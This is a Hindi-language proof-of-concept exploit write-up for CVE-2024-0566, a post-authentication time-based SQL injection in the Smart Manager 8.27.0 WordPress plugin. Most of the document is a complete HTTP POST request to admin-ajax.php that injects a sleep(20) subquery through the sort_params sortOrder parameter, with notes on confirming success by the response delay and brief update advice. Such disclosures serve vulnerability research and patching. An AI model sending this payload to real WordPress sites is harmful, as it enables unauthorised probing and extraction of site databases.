
CVE-2024-0566 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, Smart Manager 8.27.0 WordPress प्लगइन में पोस्ट-प्रमाणित समय-आधारित SQL इंजेक्शन। व्यवस्थापक AJAX एंडपॉइंट में सॉर्ट पैरामीटर के माध्यम से इंजेक्शन का प्रदर्शन करता है।
एक्सप्लॉइट शीर्षक: स्मार्ट मैनेजर 8.27.0 - प्रमाणीकरण-पश्चात SQL इंजेक्शन
दिनांक: 2024-01-18
एक्सप्लॉइट लेखक: इवान स्पिरिडोनोव - xbz0n
विक्रेता होमपेज: https://www.storeapps.org/
सॉफ्टवेयर लिंक: https://www.storeapps.org/product/smart-manager/
संस्करण: 8.27.0
परीक्षण किया गया: Ubuntu 22.04
CVE: CVE-2024-0566
यह प्लगइन SQL स्टेटमेंट में उपयोग करने से पहले एक पैरामीटर को ठीक से सैनिटाइज़ और एस्केप नहीं करता है, जिससे SQL इंजेक्शन उत्पन्न होता है जिसका शोषण एडमिन जैसे उच्च-विशेषाधिकार वाले उपयोगकर्ता कर सकते हैं।
यह भेद्यता एडमिन AJAX एंडपॉइंट के सॉर्टिंग पैरामीटर्स 'sort_params%5BsortOrder%5D' और 'sort_params%5Bcolumn%5D' में स्थित है। इन पैरामीटर्स में हेरफेर करके, प्रमाणीकृत हमलावर SQL कमांड इंजेक्ट कर सकते हैं, जिससे समय-आधारित SQL इंजेक्शन भेद्यता उत्पन्न होती है।
POST /wp-admin/admin-ajax.php?action=sm_beta_include_file HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=smart-manager
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1117
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
cmd=get_data_model&active_module=product&security=37e8d818b7&is_public=1&sm_page=1&sm_limit=50&SM_IS_WOO30=true&sort_params%5Bcolumn%5D=postmeta%2Fmeta_key%3D_tax_status%2Fmeta_value%3D_tax_status&sort_params%5BsortOrder%5D=asc%2c(select*from(select(sleep(20)))a)&table_model%5Bposts%5D%5Bpkey%5D=ID&table_model%5Bposts%5D%5Bjoin_on%5D=&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_type%5D%5B%5D=product_variation&table_model%5Bposts%5D%5Bwhere%5D%5Bpost_status%5D=any&table_model%5Bpostmeta%5D%5Bpkey%5D=post_id&table_model%5Bpostmeta%5D%5Bjoin_on%5D=postmeta.post_ID+%3D+posts.ID&table_model%5Bterm_relationships%5D%5Bpkey%5D=object_id&table_model%5Bterm_relationships%5D%5Bjoin_on%5D=term_relationships.object_id+%3D+posts.ID&table_model%5Bterm_taxonomy%5D%5Bpkey%5D=term_taxonomy_id&table_model%5Bterm_taxonomy%5D%5Bjoin_on%5D=term_taxonomy.term_taxonomy_id+%3D+term_relationships.term_taxonomy_id&table_model%5Bterms%5D%5Bpkey%5D=term_id&table_model%5Bterms%5D%5Bjoin_on%5D=terms.term_id+%3D+term_taxonomy.term_id&search_text=&advanced_search_query=%5B%5D&is_view=0&isTasks=0&is_taxonomy=0
यदि सर्वर प्रतिक्रिया लगभग 20 सेकंड तक विलंबित होती है, तो यह समय-आधारित SQL इंजेक्शन के सफल शोषण को इंगित करता है, जो भेद्यता की पुष्टि करता है।
स्मार्ट मैनेजर v8.27.0 के उपयोगकर्ताओं को दृढ़ता से सलाह दी जाती है कि वे प्रभावित एंडपॉइंट तक पहुंच प्रतिबंधित करें और प्लगइन को नवीनतम संस्करण में अपडेट करें।